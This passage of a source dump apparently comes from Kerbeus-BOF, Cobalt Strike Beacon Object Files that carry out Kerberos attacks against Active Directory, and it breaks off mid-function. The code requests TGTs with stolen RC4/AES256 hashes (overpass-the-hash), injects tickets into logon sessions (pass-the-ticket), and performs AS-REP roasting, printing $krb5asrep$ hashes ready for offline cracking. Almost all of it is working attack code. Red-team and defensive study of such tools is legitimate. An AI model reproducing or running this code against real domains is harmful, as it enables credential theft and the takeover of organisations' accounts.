        submitRequest->KerbCredSize = decode_ticket_size;
        submitRequest->KerbCredOffset = sizeof(KERB_SUBMIT_TKT_REQUEST);
        if (IsHighIntegrity)
            submitRequest->LogonId = targetLuid;
        else
            submitRequest->LogonId = (LUID){ 0 };

        MemCpy((PBYTE)submitRequest + submitRequest->KerbCredOffset, decode_ticket, decode_ticket_size);

        NTSTATUS protocolStatus = 0;
        ULONG    responseSize = 0;
        void* response = 0;
        if (SECUR32$LsaCallAuthenticationPackage(hLsa, authPackage, submitRequest, submitSize, &response, &responseSize, &protocolStatus) || protocolStatus)
            PRINT_OUT("\n[X] Ticket not imported.\n");
        else
            PRINT_OUT("\n[+] Ticket successfully imported.\n");
    }
    SECUR32$LsaDeregisterLogonProcess(hLsa);
}



BOOL NewAS_REP(AsnElt asn_AS_REP, AS_REP* as_rep) {
    // AS-REP::= [APPLICATION 11] KDC-REQ
    if ((asn_AS_REP.subCount != 1) || (asn_AS_REP.sub[0].tagValue != 16)) {
        PRINT_OUT("First AS-REP sub should be a sequence");
        return TRUE;
    }

    AsnElt* kdc_rep = asn_AS_REP.sub[0].sub;

    for (int i = 0; i < asn_AS_REP.sub[0].subCount; i++) {
        int tagValue = kdc_rep[i].tagValue;
        if ( tagValue == 0 ) {
            if (AsnGetInteger(&(kdc_rep[i].sub[0]), &(as_rep->pvno))) return TRUE;
        }
        if ( tagValue == 1 ) {
            if (AsnGetInteger(&(kdc_rep[i].sub[0]), &(as_rep->msg_type)))return TRUE;
        }
        if ( tagValue == 2 ) {
            as_rep->pa_data_count = kdc_rep[i].subCount;
            as_rep->pa_data = MemAlloc(as_rep->pa_data_count);
            for (int j = 0; j < as_rep->pa_data_count; j++) {
                PA_DATA padata = { 0 };
                if (AsnGetPaData(&(kdc_rep[i].sub[j].sub[0]), &padata)) return TRUE;
                as_rep->pa_data[j] = padata;
            }
        }
        if ( tagValue == 3 ) {
                if (AsnGetString(&(kdc_rep[i].sub[0]), &(as_rep->crealm))) return TRUE;
        }
        if ( tagValue == 4 ) {
                if (AsnGetPrincipalName(&(kdc_rep[i].sub[0]), &(as_rep->cname))) return TRUE;
        }
        if ( tagValue == 5 ) {
            if (kdc_rep[i].sub[0].subCount)
                if (AsnGetTicket(&(kdc_rep[i].sub[0].sub[0]), &(as_rep->ticket))) return TRUE;
        }
        if ( tagValue == 6 ) {
            if (AsnGetEncryptedData(&(kdc_rep[i].sub[0]), &(as_rep->enc_part))) return TRUE;
        }
    }
    kdc_rep = NULL;
    return FALSE;
}

BOOL HandleASREP(AsnElt responseAsn, EncryptionKey encKey, byte* serviceKey, BOOL getCredentials, byte* dcIP, byte** ticket) {
    AS_REP as_rep = { 0 };
    if (NewAS_REP(responseAsn, &as_rep)) return TRUE;

    byte* key = NULL;
    size_t keySize;
    byte* result;
    size_t resultSize;
    key = encKey.key_value;
    if (as_rep.enc_part.etype != encKey.key_type) {
        PRINT_OUT("[!] Warning: Supplied encyption key type but AS-REP contains data encrypted");
        return TRUE;
    }

    int key_usage = 0;
    if (as_rep.enc_part.etype == aes128_cts_hmac_sha1 || as_rep.enc_part.etype == aes256_cts_hmac_sha1) {
        key_usage = 3;
    }
    else if (as_rep.enc_part.etype == rc4_hmac || as_rep.enc_part.etype == des_cbc_md5) {
        key_usage = 8;
    }
    else {
        PRINT_OUT("[X] Encryption type \"%d\" not currently supported", as_rep.enc_part.etype);
        return TRUE;
    }

    if (decrypt(key, encKey.key_type, key_usage, as_rep.enc_part.cipher, as_rep.enc_part.cipher_size, &result, &resultSize))return TRUE;

    AsnElt ae = { 0 };
    if (BytesToAsnDecode(result, resultSize, &ae)) return TRUE;
    if (ae.tagValue != 25) {
        PRINT_OUT("[X] Failed to decrypt TGT using supplied password/hash. If this TGT was requested with no preauth then the password supplied may be incorrect or the data was encrypted with a different type of encryption than expected");
        return TRUE;
    }

    EncKDCRepPart encRepPart = { 0 };
    if (AsnGetEncKDCRepPart(&(ae.sub[0]), &encRepPart)) return TRUE;

    KRB_CRED cred = { 0 };
    cred.pvno = 5;
    cred.msg_type = 22;
    cred.ticket_count = 1;
    cred.tickets = MemAlloc(sizeof(Ticket) * cred.ticket_count);
    cred.tickets[0] = as_rep.ticket;

    KrbCredInfo info = { 0 };
    info.key = encRepPart.key;
    info.flags = encRepPart.flags;
    info.starttime = encRepPart.starttime;
    info.endtime = encRepPart.endtime;
    info.renew_till = encRepPart.renew_till;
    info.pname = as_rep.cname;
    info.sname = encRepPart.sname;

    my_copybuf(&(info.prealm), encRepPart.realm, my_strlen(encRepPart.realm) + 1);
    my_copybuf(&(info.srealm), encRepPart.realm, my_strlen(encRepPart.realm) + 1);

    cred.enc_part.ticket_count = 1;
    cred.enc_part.ticket_info = MemAlloc(sizeof(KrbCredInfo) * cred.enc_part.ticket_count);
    cred.enc_part.ticket_info[0] = info;

    AsnElt asnKirbi = { 0 };
    if (AsnKrbCredEncode(&cred, &asnKirbi)) return TRUE;

    int kirbiBytesSize = 0;
    byte* kirbiBytes = 0;
    if (AsnToBytesEncode(&asnKirbi, &kirbiBytesSize, &kirbiBytes)) return TRUE;

    *ticket = base64_encode(kirbiBytes, kirbiBytesSize);
    return FALSE;
}

BOOL NewAS_REQ( char* pcUsername, char* pcDomain, EncryptionKey encKey, BOOL opsec, BOOL bPac, BOOL is_nopreauth, char* service, AS_REQ* as_req ) {
    BOOL status = FALSE;

    as_req->pvno = 5;
    as_req->msg_type = KERB_AS_REQ;

    as_req->req_body.kdc_options = FORWARDABLE | RENEWABLE | RENEWABLEOK;
    as_req->req_body.till = 1 * 3600;   // valid for 1h
    ADVAPI32$SystemFunction036(&(as_req->req_body.nonce), 4);
    if (my_copybuf(&as_req->req_body.realm, pcDomain, my_strlen(pcDomain) + 1)) return TRUE;

    as_req->req_body.cname.name_type = PRINCIPAL_NT_PRINCIPAL;
    as_req->req_body.cname.name_count = 1;
    as_req->req_body.cname.name_string = MemAlloc(sizeof(void*) * as_req->req_body.cname.name_count);
    if (!as_req->req_body.cname.name_string) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
    if (my_copybuf(&(as_req->req_body.cname.name_string[0]), pcUsername, my_strlen(pcUsername) + 1)) return TRUE;

    if (service) {

        int partsCount = 1;
        int index = 0;
        while (service[index]) {
            if (service[index] == '/')
                partsCount++;
            index++;
        }

        as_req->req_body.sname.name_count  = partsCount;
        as_req->req_body.sname.name_string = MemAlloc(sizeof(void*) * partsCount);
        as_req->req_body.sname.name_type   = (partsCount > 1) ? PRINCIPAL_NT_SRV_INST : PRINCIPAL_NT_PRINCIPAL;

        int partIndex = 0;
        int startIndex = 0;
        index = 0;
        while (service[index] && partIndex < partsCount) {
            if (service[index] == '/') {
                int partLen = index - startIndex;
                if (my_copybuf(&(as_req->req_body.sname.name_string[partIndex]), service + startIndex, partLen + 1)) return TRUE;
                as_req->req_body.sname.name_string[partIndex][partLen] = 0;
                startIndex = index + 1;
                partIndex++;
            }
            index++;
        }
        if (my_copybuf(&(as_req->req_body.sname.name_string[partIndex]), service + startIndex, index - startIndex + 1)) return TRUE;
    }
    else {
        as_req->req_body.sname.name_count = 2;
        as_req->req_body.sname.name_string = MemAlloc(sizeof(void*) * 2);
        as_req->req_body.sname.name_type = PRINCIPAL_NT_SRV_INST;
        if (my_copybuf(&(as_req->req_body.sname.name_string[0]), "krbtgt", 7)) return TRUE;
        if (my_copybuf(&(as_req->req_body.sname.name_string[1]), pcDomain, my_strlen(pcDomain) + 1)) return TRUE;
    }

    int pa_index = 0;
    if (is_nopreauth) {
        as_req->pa_data_count = 1;
        as_req->pa_data = MemAlloc(sizeof(PA_DATA) * as_req->pa_data_count);
        if (!as_req->pa_data) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
    }
    else {
        as_req->pa_data_count = 2;
        as_req->pa_data = MemAlloc(sizeof(PA_DATA) * as_req->pa_data_count);
        if (!as_req->pa_data) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        if (AsnEncTimeStampToPaDataEncode(encKey, &(as_req->pa_data[0]))) return TRUE;
        pa_index++;
    }
    as_req->pa_data[pa_index].type = PADATA_PA_PAC_REQUEST;
    as_req->pa_data[pa_index].value = MemAlloc(sizeof(KERB_PA_PAC_REQUEST));
    if (!as_req->pa_data[pa_index].value) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
    ((KERB_PA_PAC_REQUEST*)as_req->pa_data[pa_index].value)->include_pac = bPac;

    if (opsec) {
        as_req->req_body.rtime = 1 * 3600;   // valid for 1h
        as_req->req_body.kdc_options |= CANONICALIZE;

        as_req->req_body.etypes_count = 6;
        as_req->req_body.etypes = MemAlloc(sizeof(int) * as_req->req_body.etypes_count);
        if (!as_req->req_body.etypes) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        as_req->req_body.etypes[0] = aes256_cts_hmac_sha1;
        as_req->req_body.etypes[1] = aes128_cts_hmac_sha1;
        as_req->req_body.etypes[2] = rc4_hmac;
        as_req->req_body.etypes[3] = rc4_hmac_exp;
        as_req->req_body.etypes[4] = old_exp;
        as_req->req_body.etypes[5] = des_cbc_md5;

        as_req->req_body.addresses_count = 1;
        as_req->req_body.addresses = MemAlloc(as_req->req_body.addresses_count * sizeof(HostAddress));
        if (!as_req->req_body.addresses) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }

        int size = MAX_COMPUTERNAME_LENGTH + 2;
        char* hostname = MemAlloc(size);
        if (!hostname) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        KERNEL32$GetComputerNameA(hostname, &size);
        int netbiosSize = 16;
        int numSpaces = (size < netbiosSize) ? (netbiosSize - size) : 0;
        int i = 0;
        for (; i < numSpaces; i++)
            hostname[size + i] = ' ';
        hostname[size + numSpaces] = 0;

        as_req->req_body.addresses[0].addr_type = ADDRTYPE_NETBIOS;
        as_req->req_body.addresses[0].addr_string = hostname;
    }
    else {
        as_req->req_body.etypes_count = 1;
        as_req->req_body.etypes = MemAlloc(sizeof(int) * as_req->req_body.etypes_count);
        if (!as_req->req_body.etypes) {
            PRINT_OUT("[x] Failed alloc memory");
            return TRUE;
        }
        as_req->req_body.etypes[0] = encKey.key_type;
    }

    return FALSE;
}

BOOL CreateEncKey(char* domain, char* user, char* password, int currentEtype, int encType, EncryptionKey* encKey) {
    if (currentEtype == 0) {
        if (encType == rc4_hmac) {
            encKey->key_type = rc4_hmac;
            return get_key_rc4(password, &(encKey->key_value), &(encKey->key_size));
        }
        else if (encType == aes256_cts_hmac_sha1) {
            encKey->key_type = aes256_cts_hmac_sha1;
            return get_key_aes256(domain, user, password, &(encKey->key_value), &(encKey->key_size));
        }
        else {
            encKey->key_type = rc4_hmac;
            return get_key_rc4(password, &(encKey->key_value), &(encKey->key_size));
        }
    }
    else {
        encKey->key_type = encType;
        encKey->key_size = my_strlen(password) / 2;
        if (((encType == rc4_hmac) && (encKey->key_size == 16)) || ((encType == aes256_cts_hmac_sha1) && (encKey->key_size == 32))) {
            encKey->key_value = MemAlloc(encKey->key_size);
            for (int i = 0, j = 0; j < encKey->key_size; i += 2, j++)
                encKey->key_value[j] = (password[i] % 32 + 9) % 25 * 16 + (password[i + 1] % 32 + 9) % 25;
            return FALSE;
        }
    }
    return TRUE;
}

BOOL NoPreAuthTGT(char* user, char* domain, EncryptionKey encKey, char* domainController, BOOL describe, BOOL verbose, BOOL ptt, BOOL* ret) {

    AS_REQ NoPreAuthASREQ = { 0 };
    if (NewAS_REQ(user, domain, encKey, TRUE, TRUE, TRUE, NULL, &NoPreAuthASREQ)) return TRUE;

    AsnElt requestAsn = { 0 };
    if (ReqToAsnEncode(NoPreAuthASREQ, 10, &requestAsn)) return TRUE;

    int bRequestAsnSize = 0;
    byte* bRequestAsn = 0;
    if (AsnToBytesEncode(&requestAsn, &bRequestAsnSize, &bRequestAsn)) return TRUE;

    byte* response = NULL;
    int responseSize = 0;
    sendBytes(domainController, "88", bRequestAsn, bRequestAsnSize, &response, &responseSize);

    if (responseSize == 0) {
        *ret = FALSE;
        return TRUE;
    }

    AsnElt responseAsn = { 0 };
    if (BytesToAsnDecode(response, responseSize, &responseAsn)) return TRUE;

    if (responseAsn.tagValue == KERB_AS_REP) {
        if (verbose)
            PRINT_OUT("[-] AS-REQ w/o preauth successful! %s has pre-authentication disabled!\n", user);

        if (encKey.key_value != NULL) {
            byte* kirbiBytes = NULL;
            if (HandleASREP(responseAsn, encKey, NULL, FALSE, domainController, &kirbiBytes)) return TRUE;
            *ret = TRUE;
            if (ptt)
                PTT(NULL, kirbiBytes);
        }
        else {
            // No key provided - output AS-REP hash for offline cracking
            AS_REP as_rep = { 0 };
            if (NewAS_REP(responseAsn, &as_rep)) return TRUE;

            // Format: $krb5asrep$etype$user@domain:cipher
            char* etype_str = "23";
            if (as_rep.enc_part.etype == aes256_cts_hmac_sha1)
                etype_str = "18";
            else if (as_rep.enc_part.etype == aes128_cts_hmac_sha1)
                etype_str = "17";

            // Convert cipher to hex
            int hexLen = as_rep.enc_part.cipher_size * 2 + 1;
            char* hexCipher = MemAlloc(hexLen);
            my_tohex(as_rep.enc_part.cipher, as_rep.enc_part.cipher_size, hexCipher, hexLen);

            // Extract first 32 hex chars as checksum (16 bytes)
            char checksum[33] = { 0 };
            for (int i = 0; i < 32 && i < hexLen - 1; i++)
                checksum[i] = hexCipher[i];

            // Rest is the encrypted data
            char* encData = hexCipher + 32;

            PRINT_OUT("\n[*] AS-REP hash for offline cracking:\n\n");
            PRINT_OUT("$krb5asrep$%s$%s@%s:%s$%s\n\n", etype_str, user, domain, checksum, encData);

            *ret = TRUE;
        }
    }
    else if (responseAsn.tagValue == KERB_ERROR) {
        uint error_code = 0;
        if (AsnGetErrorCode(&(responseAsn.sub[0]), &error_code)) return TRUE;
        if (error_code == 0x19) { // KDC_ERR_PREAUTH_REQUIRED
            if (verbose)
                PRINT_OUT("[!] Pre-Authentication required!\n");
        }
        else {
            PRINT_OUT("\n\t[x] Kerberos error : %d\n", error_code);
        }
        *ret = FALSE;
    }
    else {
        *ret = TRUE;
        return TRUE;
    }

    return FALSE;
}

BOOL AskTGT_hash(char* user, char* domain, char* password, int currentEtype, int encType, BOOL opsec, BOOL pac, BOOL describe, BOOL ptt, char* dc, char* service, byte** kirbiBytes) {
    EncryptionKey encKey = { 0 };
    if (CreateEncKey(domain, user, password, currentEtype, encType, &encKey)) return TRUE;

    BOOL preauth = FALSE;
    if (opsec)
        if (NoPreAuthTGT(user, domain, encKey, dc, describe, TRUE, ptt, &preauth)) return TRUE;

    if (!preauth) {
        PRINT_OUT("[*] Building AS-REQ (w/ preauth) for: '%s\\%s'\n", domain, user);

        AS_REQ userHashASREQ = { 0 };
        if (NewAS_REQ(user, domain, encKey, opsec, pac, FALSE, service, &userHashASREQ)) return TRUE;

        AsnElt requestAsn = { 0 };
        if (ReqToAsnEncode(userHashASREQ, 10, &requestAsn)) return TRUE;

        int bRequestAsnSize = 0;
        byte* bRequestAsn = 0;
        if (AsnToBytesEncode(&requestAsn, &bRequestAsnSize, &bRequestAsn)) return TRUE;

        byte* response = NULL;
        int responseSize = 0;
        sendBytes(dc, "88", bRequestAsn, bRequestAsnSize, &response, &responseSize);
        if (responseSize == 0)
            return TRUE;

        AsnElt responseAsn = { 0 };
        if (BytesToAsnDecode(response, responseSize, &responseAsn))return TRUE;

        if (responseAsn.tagValue == KERB_AS_REP) {
            if (HandleASREP(responseAsn, encKey, NULL, FALSE, dc, kirbiBytes)) return TRUE;
            if (describe) {
                PRINT_OUT("[+] TGT request successful!\n");
                PRINT_OUT("[*] base64(ticket.kirbi): \n\n%s\n\n", *kirbiBytes);
            }
            if (ptt)
                PTT(NULL, *kirbiBytes);
        }
        else if (responseAsn.tagValue == KERB_ERROR) {
            uint error_code = 0;
            if (AsnGetErrorCode(&(responseAsn.sub[0]), &error_code)) return TRUE;
            PRINT_OUT("\n\t[x] Kerberos error : %d\n", error_code);
//            PRINT_OUT("\n\t[x] Kerberos error : %s\n", lookupKrbErrorCode(error_code));
        }
        else {
            PRINT_OUT("\n[X] Unknown application tag: %d\n", responseAsn.tagValue);
        }
    }
    return FALSE;
}

void ASK_TGT_RUN( PCHAR Buffer, DWORD Length ) {
    PRINT_OUT("[*] Action: Ask TGT\n\n");

    char* user      = NULL;
    char* domain    = NULL;
    char* dc        = NULL;
    char* password  = NULL;
    char* s_enctype = NULL;
    char* cert      = NULL;
    char* hash      = NULL;
    char* service   = NULL;
    int   encType   = rc4_hmac;
    int   curEType  = 0;
    BOOL  ptt       = FALSE;
    BOOL  opsec     = FALSE;
    BOOL  pac       = FALSE;
    BOOL  nopreauth = FALSE;

    for (int i = 0; i < Length; i++) {
        i += GetStrParam(Buffer + i, Length - i, "/user:", 6, &user );
        i += GetStrParam(Buffer + i, Length - i, "/domain:", 8, &domain );
        i += GetStrParam(Buffer + i, Length - i, "/password:", 10, &password );
        i += GetStrParam(Buffer + i, Length - i, "/dc:", 4, &dc );
        i += GetStrParam(Buffer + i, Length - i, "/enctype:", 9, &s_enctype );
        i += GetStrParam(Buffer + i, Length - i, "/service:", 9, &service );
        i += IsSetParam(Buffer + i, Length - i, "/ptt", 4, &ptt );
        i += IsSetParam(Buffer + i, Length - i, "/opsec", 6, &opsec );
        i += IsSetParam(Buffer + i, Length - i, "/nopac", 6, &pac );
        i += IsSetParam(Buffer + i, Length - i, "/nopreauth", 10, &nopreauth );
        int h1 = GetStrParam(Buffer + i, Length - i, "/rc4:", 5, &hash );
        if(h1){
            encType = rc4_hmac;
            curEType = encType;
        }
        int h2 = GetStrParam(Buffer + i, Length - i, "/aes256:", 8, &hash );
        if(h2){
            encType = aes256_cts_hmac_sha1;
            curEType = encType;
        }
    }
    pac = !pac;

    // /enctype overrides default encType (for password-based auth)
    if( s_enctype ) {
        if (my_strcmp(s_enctype, "rc4") == 0)
            encType = rc4_hmac;
        else if (my_strcmp(s_enctype, "aes256") == 0)
            encType = aes256_cts_hmac_sha1;
    }

    GetDomainInfo(&domain, &dc);
    if (domain == NULL || dc == NULL) {
        PRINT_OUT("[X] Could not retrieve domain information!\n\n");
        return;
    }

    if (user == NULL) {
        PRINT_OUT("[X] You must supply a user name!\n\n");
        return;
    }

    if (((hash || password) == NULL) && (cert == NULL) && !nopreauth) {
        PRINT_OUT("[X] You must supply a /password, /certificate or a [ /rc4 | /aes256 ] hash!\n\n");
        return;
    }

    if (!password && hash)
        password = hash;

    if (!(encType == rc4_hmac || encType == aes256_cts_hmac_sha1) && !nopreauth) {
        PRINT_OUT("[X] Only /rc4 and /aes256 are supported.\n\n");
        return;
    }
    else {
        if (opsec && encType != aes256_cts_hmac_sha1) {
            PRINT_OUT("[X] Using /opsec but not using /enctype:aes256\n");
            return;
        }

        byte* ticket = NULL;
        if (nopreauth) {
            EncryptionKey encKey = { 0 };
            encKey.key_type = encType;
            BOOL ret = FALSE;
            if (NoPreAuthTGT(user, domain, encKey, dc, TRUE, TRUE, ptt, &ret)) return;
        }
        else if (cert) {
            //PRINT_OUT("Ask.TGT(user, domain, certificate);\n");
        }
        else {
            AskTGT_hash(user, domain, password, curEType, encType, opsec, pac, TRUE, ptt, dc, service, &ticket);
        }
    }
}

VOID go( IN PCHAR Buffer, IN ULONG Length ) {
    INIT_BOF();

    datap parser;
    BeaconDataParse(&parser, Buffer, Length);
    DWORD PARAM_SIZE = 0;
    PBYTE PARAM = BeaconDataExtract(&parser, &PARAM_SIZE);

    if( LoadFunc() )
        PRINT_OUT("%s\n", "Modules not loaded");
    else
        ASK_TGT_RUN( PARAM, PARAM_SIZE );

    FreeBank();

    END_BOF();
}


================================================
FILE: AD-BOF/Kerbeus-BOF/asreproasting/asreproasting.c
================================================
#include "_include/functions.c"
#include "_include/asn_decode.c"
#include "_include/asn_encode.c"
#include "_include/connection.c"

BOOL NewAS_REP(AsnElt asn_AS_REP, AS_REP* as_rep) {
    // AS-REP::= [APPLICATION 11] KDC-REQ
    if ((asn_AS_REP.subCount != 1) || (asn_AS_REP.sub[0].tagValue != 16)) {
        PRINT_OUT("First AS-REP sub should be a sequence");
        return TRUE;
    }

    AsnElt* kdc_rep = asn_AS_REP.sub[0].sub;

    for (int i = 0; i < asn_AS_REP.sub[0].subCount; i++) {
        int tagValue = kdc_rep[i].tagValue;
        if ( tagValue == 0 ) {
            if (AsnGetInteger(&(kdc_rep[i].sub[0]), &(as_rep->pvno))) return TRUE;
        }
        if ( tagValue == 1 ) {
            if (AsnGetInteger(&(kdc_rep[i].sub[0]), &(as_rep->msg_type)))return TRUE;
        }
        if ( tagValue == 2 ) {
            as_rep->pa_data_count = kdc_rep[i].subCount;
            as_rep->pa_data = MemAlloc(as_rep->pa_data_count);
            for (int j = 0; j < as_rep->pa_data_count; j++) {
                PA_DATA padata = { 0 };
                if (AsnGetPaData(&(kdc_rep[i].sub[j].sub[0]), &padata)) return TRUE;
                as_rep->pa_data[j] = padata;
            }
        }
        if ( tagValue == 3 ) {
            if (AsnGetString(&(kdc_rep[i].sub[0]), &(as_rep->crealm))) return TRUE;
        }
        if ( tagValue == 4 ) {
            if (AsnGetPrincipalName(&(kdc_rep[i].sub[0]), &(as_rep->cname))) return TRUE;
        }
        if ( tagValue == 5 ) {
            if (kdc_rep[i].sub[0].subCount)
                if (AsnGetTicket(&(kdc_rep[i].sub[0].sub[0]), &(as_rep->ticket))) return TRUE;
        }
        if ( tagValue == 6 ) {
            if (AsnGetEncryptedData(&(kdc_rep[i].sub[0]), &(as_rep->enc_part))) return TRUE;
        }
    }
    kdc_rep = NULL;
    return FALSE;
}

BOOL NewAS_REQ_ROAST(char* pcUsername, char* pcDomain, int etype, AS_REQ* as_req) {
    as_req->pvno = 5;
    as_req->msg_type = KERB_AS_REQ;

    as_req->req_body.kdc_options = FORWARDABLE | RENEWABLE | RENEWABLEOK;
    as_req->req_body.till = 1 * 3600;    // valid for 1h
    ADVAPI32$SystemFunction036(&(as_req->req_body.nonce), 4);

    if (my_copybuf(&as_req->req_body.realm, pcDomain, my_strlen(pcDomain) + 1)) return TRUE;

    as_req->req_body.cname.name_type = PRINCIPAL_NT_PRINCIPAL;
    as_req->req_body.cname.name_count = 1;
    as_req->req_body.cname.name_string = MemAlloc(sizeof(void*) * as_req->req_body.cname.name_count);
    if (!as_req->req_body.cname.name_string) {
        PRINT_OUT("[x] Failed alloc memory");
        return TRUE;
    }
    if (my_copybuf(&(as_req->req_body.cname.name_string[0]), pcUsername, my_strlen(pcUsername) + 1)) return TRUE;

    as_req->req_body.sname.name_type = PRINCIPAL_NT_SRV_INST;
    as_req->req_body.sname.name_count = 2;
    as_req->req_body.sname.name_string = MemAlloc(sizeof(void*) * as_req->req_body.cname.name_count);
    if (my_copybuf(&(as_req->req_body.sname.name_string[0]), "krbtgt", 7)) return TRUE;
    if (my_copybuf(&(as_req->req_body.sname.name_string[1]), pcDomain, my_strlen(pcDomain) + 1)) return TRUE;

    as_req->pa_data_count = 1;
    as_req->pa_data = MemAlloc(sizeof(PA_DATA) * as_req->pa_data_count);
    if (!as_req->pa_data) {
        PRINT_OUT("[x] Failed alloc memory");
        return true;
    }

    as_req->pa_data[0].type = PADATA_PA_PAC_REQUEST;
    as_req->pa_data[0].value = MemAlloc(sizeof(KERB_PA_PAC_REQUEST));
    if (!as_req->pa_data[0].value) {
        PRINT_OUT("[x] Failed alloc memory");
        return true;
    }
    ((KERB_PA_PAC_REQUEST*)as_req->pa_data[0].value)->include_pac = 1;

    as_req->req_body.etypes_count = 1;
    as_req->req_body.etypes = MemAlloc(sizeof(int) * as_req->req_body.etypes_count);
    as_req->req_body.etypes[0] = etype;

    return FALSE;
}

void GetASRepHash(char* userName, char* domain, char* domainController, BOOL aesEType) {
    PRINT_OUT("[*] Building AS-REQ (w/o preauth) for: '%s\\%s'\n\n", domain, userName);

    AsnElt responseAsnMain = { 0 };
    int requestedEType;

    if (aesEType) {
        PRINT_OUT("[*] Requesting AES128 as the encryption type\n");

        AS_REQ AuthASREQ = { 0 };
        if (NewAS_REQ_ROAST(userName, domain, aes128_cts_hmac_sha1, &AuthASREQ)) return;

        AsnElt requestAsn = { 0 };
        if (ReqToAsnEncode(AuthASREQ, 10, &requestAsn)) return;

        int reqBytesSize = 0;
        byte* reqBytes = 0;
        if (AsnToBytesEncode(&requestAsn, &reqBytesSize, &reqBytes)) return;

        byte* response = NULL;
        int responseSize = 0;
        sendBytes(domainController, "88", reqBytes, reqBytesSize, &response, &responseSize);
        if (responseSize == 0)
            return;

        requestedEType = aes128_cts_hmac_sha1;

        AsnElt responseAsn = { 0 };
        if (BytesToAsnDecode3(response, responseSize, FALSE, &responseAsn)) return;

        if (responseAsn.tagValue == KERB_ERROR) {
            uint error_code = 0;
            if (AsnGetErrorCode(&(responseAsn.sub[0]), &error_code)) return;

            if (error_code == 14) {
                PRINT_OUT("[*] AES128 is not supported, attempting AES256 next\n");

                AS_REQ AuthASREQ2 = { 0 };
                if (NewAS_REQ_ROAST(userName, domain, aes256_cts_hmac_sha1, &AuthASREQ2)) return;

                AsnElt requestAsn2 = { 0 };
                if (ReqToAsnEncode(AuthASREQ2, 10, &requestAsn2)) return ;

                int reqBytesSize2 = 0;
                byte* reqBytes2 = 0;
                if (AsnToBytesEncode(&requestAsn2, &reqBytesSize2, &reqBytes2)) return;

                byte* response2 = NULL;
                int responseSize2 = 0;
                sendBytes(domainController, "88", reqBytes2, reqBytesSize2, &response2, &responseSize2);
                if (responseSize2 == 0)
                    return;

                requestedEType = aes256_cts_hmac_sha1;

                if (BytesToAsnDecode3(response2, responseSize2, FALSE, &responseAsnMain)) return;
            }
        }
        else {
            responseAsnMain = responseAsn;
        }
    }
    else {
        AS_REQ AuthASREQ = { 0 };
        if (NewAS_REQ_ROAST(userName, domain, rc4_hmac, &AuthASREQ)) return;

        AsnElt requestAsn = { 0 };
        if (ReqToAsnEncode(AuthASREQ, 10, &requestAsn)) return;

        int reqBytesSize = 0;
        byte* reqBytes = 0;
        if (AsnToBytesEncode(&requestAsn, &reqBytesSize, &reqBytes)) return;

        byte* response = NULL;
        int responseSize = 0;
        sendBytes(domainController, "88", reqBytes, reqBytesSize, &response, &responseSize);
        if (responseSize == 0)
            return;

        requestedEType = rc4_hmac;

        if (BytesToAsnDecode3(response, responseSize, FALSE, &responseAsnMain)) return;
    }

    if (responseAsnMain.tagValue == KERB_AS_REP) {
        PRINT_OUT("[+] AS-REQ w/o preauth successful!\n");

        AS_REP rep = { 0 };
        if (NewAS_REP(responseAsnMain, &rep)) return;
        int usernameLength = my_strlen(userName);
        int domainLength = my_strlen(domain);
        int hashStringLength = 18 + usernameLength + domainLength + rep.enc_part.cipher_size * 2;
        char* hashString = MemAlloc(hashStringLength);

        if (requestedEType == aes128_cts_hmac_sha1 || requestedEType == aes256_cts_hmac_sha1) {
            MemCpy(hashString, "$krb5asrep$17$", 14);
            MemCpy(hashString + 14, userName, usernameLength);
            hashString[14 + usernameLength] = '$';
            MemCpy(hashString + 15 + usernameLength, domain, domainLength);
            hashString[15 + usernameLength + domainLength] = '$';
            char* c1 = hashString + 16 + usernameLength + domainLength;
            my_tohex(rep.enc_part.cipher + rep.enc_part.cipher_size - 12, 12, &c1, 25);
            hashString[16 + usernameLength + domainLength + 24] = '$';
            char* c2 = hashString + 17 + usernameLength + domainLength + 24;
            my_tohex(rep.enc_part.cipher, rep.enc_part.cipher_size - 12, &c2, (rep.enc_part.cipher_size - 12) * 2 + 1);

            if (requestedEType == aes256_cts_hmac_sha1)
                hashString[12] = '8';
        }
        else {
            MemCpy(hashString, "$krb5asrep$23$", 14);
            MemCpy(hashString + 14, userName, usernameLength);
            hashString[14 + usernameLength] = '@';
            MemCpy(hashString + 15 + usernameLength, domain, domainLength);
            hashString[15 + usernameLength + domainLength] = ':';
            char* c1 = hashString + 16 + usernameLength + domainLength;
            my_tohex(rep.enc_part.cipher, 16, &c1, 33);
            hashString[16 + usernameLength + domainLength + 32] = '$';
            char* c2 = hashString + 17 + usernameLength + domainLength + 32;
            my_tohex(rep.enc_part.cipher + 16, rep.enc_part.cipher_size - 16, &c2, (rep.enc_part.cipher_size - 16) * 2 + 1);
        }
        PRINT_OUT("[*] AS-REP hash:\n      %s\n", hashString);
    }
    else if (responseAsnMain.tagValue == KERB_ERROR) {
        uint error_code = 0;
        if (AsnGetErrorCode(&(responseAsnMain.sub[0]), &error_code)) return;
        PRINT_OUT("\n\t[x] Kerberos error : %d\n", error_code);
//        PRINT_OUT("\n\t[x] Kerberos error : %s\n", lookupKrbErrorCode(error_code));
    }
    else {
        PRINT_OUT("\n[X] Unknown application tag: %d\n", responseAsnMain.tagValue);
    }
}

void ASREPROAST_RUN( PCHAR Buffer, DWORD Length ) {
    PRINT_OUT("[*] Action: AS-REP roasting\n");

    char* dc     = NULL;
    char* user   = NULL;
    char* domain = NULL;
    BOOL  aes    = FALSE;

    for (int i = 0; i < Length; i++) {
        i += GetStrParam(Buffer + i, Length - i, "/dc:", 4, &dc);
        i += GetStrParam(Buffer + i, Length - i, "/user:", 6, &user);
        i += GetStrParam(Buffer + i, Length - i, "/domain:", 8, &domain);
        i += IsSetParam(Buffer + i, Length - i, "/aes", 4, &aes );
    }

    GetDomainInfo(&domain, &dc);
    if (domain == NULL || dc == NULL) {
        PRINT_OUT("[X] Could not retrieve domain information!\n\n");
        return;
    }

    if (user == NULL) {
        PRINT_OUT("[X] You must supply a user name!\n\n");
        return;
    }

    PRINT_OUT("[*] Target User            : %s\n", user);
    PRINT_OUT("[*] Target Domain          : %s\n", domain);
    PRINT_OUT("[*] Target DC              : %s\n", dc);

    GetASRepHash(user, domain, dc, aes);
}

VOID go( IN PCHAR Buffer, IN ULONG Length ) {
